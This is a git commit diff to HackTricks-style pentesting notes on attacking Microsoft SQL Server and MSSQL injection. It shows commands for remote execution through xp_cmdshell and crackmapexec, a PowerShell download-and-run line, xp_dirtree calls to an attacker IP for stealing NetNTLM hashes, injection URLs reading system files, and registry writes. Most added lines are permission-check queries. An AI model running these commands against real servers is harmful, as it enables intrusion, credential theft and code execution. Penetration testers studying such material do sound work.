GitBook: [#3589] No subject

2024-11-15 01:17:36 +00:00 · 2022-10-10 00:51:01 +00:00 · 2022-10-10 00:51:01 +00:00 · 0083ed7909
commit 0083ed7909
parent 74a5aae5a5
2 changed files with 95 additions and 14 deletions
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@ -171,17 +171,34 @@ SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
 SELECT * FROM fn_my_permissions(NULL, 'SERVER');
 # Get all my permissions over a database
 USE <database>
-SELECT * FROM fn_my_permissions(NULL, 'DATABASE'); 
+SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
+# Get members of the role "sysadmin"
+Use master
+EXEC sp_helpsrvrolemember 'sysadmin';
+# Get if the current user is sysadmin
+SELECT IS_SRVROLEMEMBER('sysadmin');
+# Get users that can run xp_cmdshell
+Use master
+EXEC sp_helprotect 'xp_cmdshell'
 ```

 ## Tricks

-### Execute commands
+### Execute OS Commands
+
+{% hint style="danger" %}
+Note that in order to be able to execute commands it's not only necessary to have **`xp_cmdshell`** **enabled**, but also have the **EXECUTE permission on the `xp_cmdshell` stored procedure**. You can get who (except sysadmins) can use **`xp_cmdshell`** with:
+
+```sql
+Use master
+EXEC sp_helprotect 'xp_cmdshell'
+```
+{% endhint %}

 ```bash
-#Username + Password + CMD command
+# Username + Password + CMD command
 crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
-#Username + Hash + PS command
+# Username + Hash + PS command
 crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

 # Check if xp_cmdshell is enabled
@ -208,14 +225,13 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1

 ### Steal NetNTLM hash / Relay attack

-[You can extract the](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [**NTLM hash**](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [of the user making the service authenticate against you.](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/)\
 You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).

 ```bash
 xp_dirtree '\\<attacker_IP>\any\thing'
 exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
 EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
-EXEC master..xp_fileexists '\\<attacker_IP>\anything\'
+EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

 # Capture hash
 sudo responder -I tun0
@ -223,6 +239,17 @@ sudo impacket-smbserver share ./ -smb2support
 msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
 ```

+{% hint style="warning" %}
+You can check if who (apart sysadmins) has permissions to run those MSSQL functions with:
+
+```sql
+Use master;
+EXEC sp_helprotect 'xp_dirtree';
+EXEC sp_helprotect 'xp_subdirs';
+EXEC sp_helprotect 'xp_fileexist';
+```
+{% endhint %}
+
 Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\
 You can see how to use these tools in:

@ -245,13 +272,11 @@ To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures
 ```bash
 # Enable Ole Automation Procedures
 sp_configure 'show advanced options', 1
-GO
 RECONFIGURE
-GO
+
 sp_configure 'Ole Automation Procedures', 1
-GO
 RECONFIGURE
-GO
+

 # Create a File
 DECLARE @OLE INT
@ -281,7 +306,7 @@ However, the **`BULK`** option requires the **`ADMINISTER BULK OPERATIONS`** or
 https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- 
 ```

-### **Read files executing scripts (Python and R)**
+### **RCE/Read files executing scripts (Python and R)**

 MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.

@ -292,7 +317,7 @@ Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
 Example using configured python to perform several actions:

 ```sql
-#Print the user being used (and execute commands)
+# Print the user being used (and execute commands)
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
 #Open and read a file
@ -307,7 +332,32 @@ GO

 ### Read Registry

-Microsoft SQL Server provides **multiple extended stored procedures** that allow you to interact with not only the network but also the file system and even the [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
+Microsoft SQL Server provides **multiple extended stored procedures** that allow you to interact with not only the network but also the file system and even the [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
+
+| **Regular**                  | **Instance-Aware**                     |
+| ---------------------------- | -------------------------------------- |
+| sys.xp\_regread              | sys.xp\_instance\_regread              |
+| sys.xp\_regenumvalues        | sys.xp\_instance\_regenumvalues        |
+| sys.xp\_regenumkeys          | sys.xp\_instance\_regenumkeys          |
+| sys.xp\_regwrite             | sys.xp\_instance\_regwrite             |
+| sys.xp\_regdeletevalue       | sys.xp\_instance\_regdeletevalue       |
+| sys.xp\_regdeletekey         | sys.xp\_instance\_regdeletekey         |
+| sys.xp\_regaddmultistring    | sys.xp\_instance\_regaddmultistring    |
+| sys.xp\_regremovemultistring | sys.xp\_instance\_regremovemultistring |
+
+```sql
+# Example read registry
+EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
+# Example write and then read registry
+EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
+EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
+# Example to check who can use these functions
+Use master;
+EXEC sp_helprotect 'xp_regread';
+EXEC sp_helprotect 'xp_regwrite';
+```
+
+For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).

 ### RCE with MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>

@ -450,6 +500,8 @@ You probably will be able to **escalate to Administrator** following one of thes
 * [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
 * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
 * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
+* [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
+* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)

 ## HackTricks Automatic Commands

--- a/pentesting-web/sql-injection/mssql-injection.md
+++ b/pentesting-web/sql-injection/mssql-injection.md
@ -63,6 +63,14 @@ https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_f

 **Permissions:** Requires **`VIEW SERVER STATE`** permission on the server.

+```sql
+# Check if you have it
+SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
+# Or doing
+Use master;
+EXEC sp_helprotect 'fn_xe_file_target_read_file';
+```
+
 ### `fn_get_audit_file`

 ```
@ -73,6 +81,14 @@ https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_aud

 **Permissions:** Requires the **`CONTROL SERVER`** permission.

+```sql
+# Check if you have it
+SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
+# Or doing
+Use master;
+EXEC sp_helprotect 'fn_get_audit_file';
+```
+
 ### `fn_trace_gettabe`

 ```
@ -83,6 +99,14 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2

 **Permissions:** Requires the **`CONTROL SERVER`** permission.

+```sql
+# Check if you have it
+SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
+# Or doing
+Use master;
+EXEC sp_helprotect 'fn_trace_gettabe';
+```
+
 ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>

 The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
@ -135,7 +159,7 @@ public partial class UserDefinedFunctions

 In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`)

-```
+```sql
 EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
 ```

@ -181,6 +205,11 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_

 **Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.

+```sql
+# Check if you have it
+SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
+```
+
 ## **Little tricks for WAF bypasses**

 Non-standard whitespace characters: %C2%85 или %C2%A0: